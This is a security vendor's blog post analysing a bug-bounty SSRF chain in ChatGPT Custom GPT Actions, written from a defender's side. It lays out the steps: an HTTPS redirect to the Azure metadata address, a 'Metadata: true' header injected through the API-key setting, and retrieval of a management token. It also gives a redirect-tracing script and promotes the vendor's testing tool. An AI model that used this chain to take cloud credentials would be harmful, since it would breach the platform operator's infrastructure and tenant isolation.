Penligent Header

When Custom GPTs Become Cloud Backdoors: The ChatGPT SSRF Hack and the Future of AI Security

If you stay in security long enough, you eventually develop a bad habit: you stop seeing “features” and start seeing potential attack paths. The recent story about “ChatGPT hacked using Custom GPTs exploiting an SSRF vulnerability to expose secrets” is a textbook example. What looked like a convenient Actions feature for Custom GPTs turned out to be a tunnel straight into OpenAI’s cloud environment. No exotic prompt sorcery, no “AI magic” gone wrong—just a very old bug, server-side request forgery, rediscovered inside a very new platform.

That is precisely why this incident is important. It is not another hype headline about AI going rogue. It is a reminder that once you embed LLMs into real infrastructure, the traditional rules of application and cloud security return with a vengeance. The models may be new; the underlying mistakes are not.

Reconstructing the exploit: from “Add Action” to cloud token

To understand what happened, you have to look at how Custom GPTs work. OpenAI’s interface lets you define Actions, which are essentially external HTTP APIs that your GPT can call based on an OpenAPI schema. For users, this feels like giving your GPT “superpowers”: it can fetch data, trigger workflows, connect to internal systems. Under the hood, it means there is a backend HTTP client, running inside OpenAI’s infrastructure, that will happily call URLs you describe and feed the responses back into the model.

A researcher from Open Security noticed exactly that. While playing with Custom GPTs, they saw the familiar pattern: user-controlled URLs, a “Test” button that sends live requests, and a server that clearly runs inside a cloud environment. Anyone who has done cloud pen-testing will recognize the instinct that follows: check whether you can trick that server into calling internal addresses on your behalf. That is the essence of SSRF.

In cloud environments, the most prized internal target is almost always the metadata service. On Azure, like on other clouds, it lives at the link-local address 169.254.169.254. From inside a VM or container, this endpoint can reveal details about the instance and, more importantly, issue short-lived tokens that allow workloads to call cloud management APIs. From outside the cloud, you cannot reach it. That is precisely why SSRF matters so much: you hijack the server’s vantage point and force it to talk to things you, as an external attacker, cannot.

The researcher’s first obstacle was that Custom GPT Actions only allowed HTTPS URLs, whereas the metadata service is HTTP-only. At first glance that restriction looks like a defense, but in practice it is just one more puzzle piece. The workaround was straightforward: register an external HTTPS domain under the researcher’s control, have it respond with a 302 redirect pointing to the http://169.254.169.254 metadata URL, and see whether the Actions backend followed the redirect. It did. Suddenly, an innocent-looking HTTPS call in the Custom GPT configuration resulted in an HTTP call to the internal cloud metadata endpoint.

Azure’s metadata service, however, is not completely naïve. To prevent casual abuse, it demands a special header, Metadata: true, on every request. If the header is missing, the service refuses to disclose real data. At this point it might seem that the system is safe again, because the OpenAPI schema interface used for defining Actions does not expose arbitrary header configuration. But large systems rarely have only one configuration surface. In this case, the Actions feature also supports the idea of “API keys” and other authentication headers that you can define when wiring an external service. Those headers are then attached automatically to outbound requests.

That was enough to complete the chain. By defining a fake “API key” whose header name was literally Metadata and whose value was true, the researcher convinced the backend to include the exact header Azure IMDS expects. Combine that with the redirect trick and you now have an SSRF channel from the Custom GPT Actions backend into the metadata service, with a valid Metadata: true header.

Once this channel was established, the rest was almost mechanical. The researcher asked the metadata service for an OAuth2 token intended for the Azure Management API, using the well-known IMDS path. The response contained an access token bound to the cloud identity that the ChatGPT infrastructure was using. That token could, at minimum, query management endpoints and potentially reach sensitive resources, depending on how much privilege the identity had. At that point, the researcher stopped, reported the findings through OpenAI’s bug bounty program, and OpenAI classified the flaw as high-severity and moved to patch it.

What makes this chain striking is that the attacker never needed shell access, source code, or any classic bug in the HTTP stack. Everything happened inside normal configuration screens: URLs, authentication settings, and a test button that dutifully executed the mischief.

AI Security Penligent

A tiny code sketch of an SSRF-style probe

To make this more concrete, imagine a very small internal helper script that a security engineer might use to sanity-check an “Actions-style” HTTP client. The goal is not to hit real metadata services in production, but to codify the habit of probing for unexpected redirects and internal IP hops in staging or lab environments:

import requests
from urllib.parse import urljoin

def trace_request(base_url: str, path: str = "/"):
    url = urljoin(base_url, path)
    print(f"[+] Requesting {url}")
    try:
        resp = requests.get(url, timeout=3, allow_redirects=True)
    except Exception as e:
        print(f"[!] Error: {e}")
        return

    print(f"[+] Final URL: {resp.url}")
    print(f"[+] Status: {resp.status_code}")
    print("[+] Redirect chain:")
    for h in resp.history:
        print(f"    {h.status_code} -> {h.headers.get('Location')}")

    # Very rough heuristic: warn if we ever landed on an internal IP
    if resp.raw._connection and hasattr(resp.raw._connection, "sock"):
        peer = resp.raw._connection.sock.getpeername()[0]
        print(f"[+] Peer IP: {peer}")
        if peer.startswith("10.") or peer.startswith("192.168.") or peer.startswith("169.254."):
            print("[!] Warning: backend followed a redirect into an internal address")

if __name__ == "__main__":
    # Example: replace with a controlled test endpoint in your own lab
    trace_request("<https://your-test-endpoint.example.com>")

A script like this does not “exploit ChatGPT,” but it captures the same investigative shape: start from a supposedly safe external URL, follow redirects, and loudly complain if your HTTP client suddenly finds itself talking to internal or link-local IP ranges. Turning that pattern into automation—and running it against the components that power your own AI Actions—is far more useful than just reading about the incident.

It is not an “AI bug”; it is old-school cloud abuse on a new stage

It is very tempting to read this as “ChatGPT was hacked” and move on. That framing misses the deeper lesson. Nothing about the model itself misbehaved. There was no prompt that somehow unlocked forbidden capabilities. The LLM did what it was told: call an Action, read the result, and summarize it. The vulnerability lived entirely in the glue between the LLM and the outside world.

That glue is exactly where security teams need to move their focus. Whenever you give an LLM the ability to call tools, Actions, or plugins, you are effectively turning it into a programmable client in your infrastructure. In the past, a user would manually call your API, and you would review their input. Now, a user gives instructions to a model, and the model translates that into API calls on their behalf. The model becomes another way for hostile intent to reach your backend.

Seen through that lens, this incident is simply OWASP SSRF in a different costume. The conditions are all familiar: user-influenced URLs, a server that can reach internal or privileged endpoints, missing or incomplete egress controls, and a cloud metadata service that is too accessible from regular workloads. The difference is that the entry point is no longer a classic web form or a JSON field; it is a configuration block that was designed to make Custom GPTs more powerful.

This is also why the blast radius matters. The affected server was not a random microservice; it was part of ChatGPT’s multi-tenant infrastructure, sitting inside OpenAI’s Azure environment. Any token obtained via IMDS belonged to a workload that already had meaningful access. Even if local defenses limited what the attacker could do, the risk profile is fundamentally different from a forgotten test VM.

AI as an integration hub: widening attack surfaces and moving trust boundaries

The more interesting story behind this bug is architectural. AI platforms are rapidly becoming integration hubs. A Custom GPT for a sales team may talk to a CRM, a billing system, and a document store. A security-focused GPT might talk to scanners, ticketing systems, and CI/CD. In each case, the LLM is not the asset; the data and actions behind those connectors are.

Once you accept that reality, your mental threat model has to change. You cannot keep thinking of “AI security” as only prompt injection, data leakage, or toxic outputs. You also have to ask deeply unglamorous questions about network boundaries, cloud identity, and tenant isolation.

What can the infrastructure that runs your Actions actually talk to on the network? The default in many cloud environments is “anything outbound is allowed as long as DNS resolves.” That made sense when services were relatively simple and engineers wanted flexibility. Put an LLM platform in the middle, however, and every tenant suddenly has a way to propose new outbound destinations through configuration, rather than code. If there is no strong egress policy, you have effectively created a programmable SSRF launcher.

How much privilege do the identities used by these workloads actually have? In the ChatGPT case, the researchers were able to request a token for the Azure Management API. Even if that token was limited by role assignments, it still represents a high-value secret. In many organizations, the temptation to give “platform infrastructure” wide permissions is strong, because it simplifies deployment. For anything that can be driven indirectly by user input—especially through AI—this temptation is dangerous.

Where exactly are the trust boundaries between tenants, between the control plane and the data plane, and between the AI runtime and the rest of the cloud? A well-designed system should assume that any one tenant’s configuration could become adversarial, that any outgoing call on behalf of that tenant might be hostile, and that any elevation from Action to metadata to management APIs is a realistic attacker goal. That perspective makes patterns like strict network segmentation, companion sidecars enforcing policies, and dedicated service identities non-negotiable rather than “nice to have.”

From one incident to a repeatable testing methodology

For defenders and builders, the real value of this story is not the specific bug; it is the testing mindset it illustrates. The researcher essentially treated Custom GPT Actions as a strange new kind of HTTP client and then walked through a familiar checklist: can I control the URL, can I reach internal hosts, can I abuse redirects, can I inject headers, can I hit metadata, can I turn that into a cloud token?

That mental checklist is exactly what should be automated inside modern penetration testing workflows for AI platforms. Instead of waiting for a headline and a bounty report, teams should be routinely turning their own Custom GPT infrastructure, plugin ecosystems, and tool chains into targets.

To make that a bit more tangible, you can think of an “AI Actions SSRF review” as a simple, repeatable sequence like this:

PhaseKey QuestionExample in the ChatGPT case
URL influenceCan a tenant meaningfully control the URL?Custom GPT Actions allow user-defined external endpoints.
Redirect behaviorDo we follow redirects into unknown locations?HTTPS endpoint redirected into 169.254.169.254.
Header manipulationCan the tenant indirectly set sensitive headers?API-key configuration used to inject Metadata: true.
Privilege and tokensWhat can any obtained token actually do?IMDS issued a management API token for the workload.

Once you have this kind of table written down for your environment, it becomes much easier to both automate and explain the testing you do. You can plug it into internal playbooks, share it with vendors, and ensure future AI features are held to the same standard.

This is where specialized, AI-aware security tooling starts to matter. A generic web scanner might not know how to navigate a UI that hides network calls behind Actions or how to reason about OpenAPI schemas used inside a GPT definition. In contrast, an AI-driven pentest platform such as Penligent can treat those schemas and configurations as first-class inputs. You can imagine a workflow where you export the Actions configuration for a set of Custom GPTs or other AI tools, feed them into an agentic testing pipeline, and let it systematically probe for SSRF conditions, unsafe redirects, unbounded network access, and metadata exposure.

Penligent’s philosophy of combining automation with human-in-the-loop control fits this pattern well. An agent can enumerate all tool definitions, generate candidate payloads for endpoints that accept URLs or hostnames, and drive scripted traffic that simulates what a curious attacker would try. Once the system discovers a promising behavior—say, that an apparently external HTTPS endpoint follows redirects into internal IP ranges—it can surface this as evidence: request logs, response snippets, and inferred internal topology. A human operator can then steer the next steps, for example asking the system to pivot specifically toward cloud metadata routes or to verify whether any returned tokens are valid against management APIs.

That sort of workflow accomplishes two things. It brings AI platforms into the same evidence-driven security loop that web applications and APIs already enjoy, and it leverages the same LLM capabilities that attackers will inevitably use, but in the service of defenders. The bug that hit ChatGPT is then no longer a one-off surprise; it becomes a test case in a regression suite you can run whenever you introduce a new integration or change your Actions infrastructure.

Practical lessons for teams building on top of AI platforms

If you are a security engineer or architect who consumes AI services rather than building them, this incident is still highly relevant. Even if you never touch Custom GPTs internally, you probably expose internal APIs, dashboards, or document stores to AI agents or co-pilots of some sort. The ideas are transferable.

The first step is to stop treating the LLM as the only thing that needs security review. Any feature that lets models call back into your environment—whether through explicit tools, Actions, or indirect webhooks—must be viewed as a potential attack graph. You should be able to answer, with some confidence, which internal services an AI component can talk to, what identities it uses, and what happens if a hostile user deliberately tries to stretch those capabilities.

The second step is to extend your testing programs to cover the AI glue code. When you commission a penetration test or run an internal red-team exercise, make sure the scope explicitly includes AI integrations: the configuration surfaces for tools, the way URLs and headers are constructed, the network paths between AI runtimes and sensitive services, and the protections around metadata endpoints. Ask for evidence that someone, somewhere, tried to abuse these like a real attacker would.

The third step is to accept that this attack surface will not shrink. As more business processes plug into LLMs, there will be more Actions, more plugins, more background services performing work on behalf of prompts. You can either bolt on security as a series of incident-driven patches, or you can build a repeatable program: clear threat models, baseline architecture patterns, automated testing flows, and tooling—potentially powered by systems like Penligent—that keeps probing as your environment evolves.

Beyond the headline

The Custom GPT SSRF hack is easy to misread as a one-time embarrassment for a single vendor. It is more productive to read it as a preview. AI platforms are rapidly growing into orchestration layers that connect users, models, APIs, and cloud infrastructure. That role comes with power, and power always comes with a bigger blast radius when something goes wrong.

The encouraging part of this story is that it also shows the path forward. The vulnerability was found by a researcher who followed old instincts in a new context. It was reported through a standard bug bounty channel. It was fixed. The rest of us can now take the same playbook and apply it proactively to our own systems, ideally with help from tools that understand both security and AI.

If we do that, then the legacy of this incident is not just “ChatGPT once had an SSRF.” It becomes a case study in how to think about AI security: treat models as one component in a larger system, treat integrations as serious attack surfaces, and use automation plus human insight—whether through platforms like Penligent or your own internal pipelines—to continually turn vague concern into concrete, testable, evidence-backed assurance. That is the kind of story worth telling on Medium, and even more worth living inside your engineering organization.

Gönderiyi paylaş:
İlgili Yazılar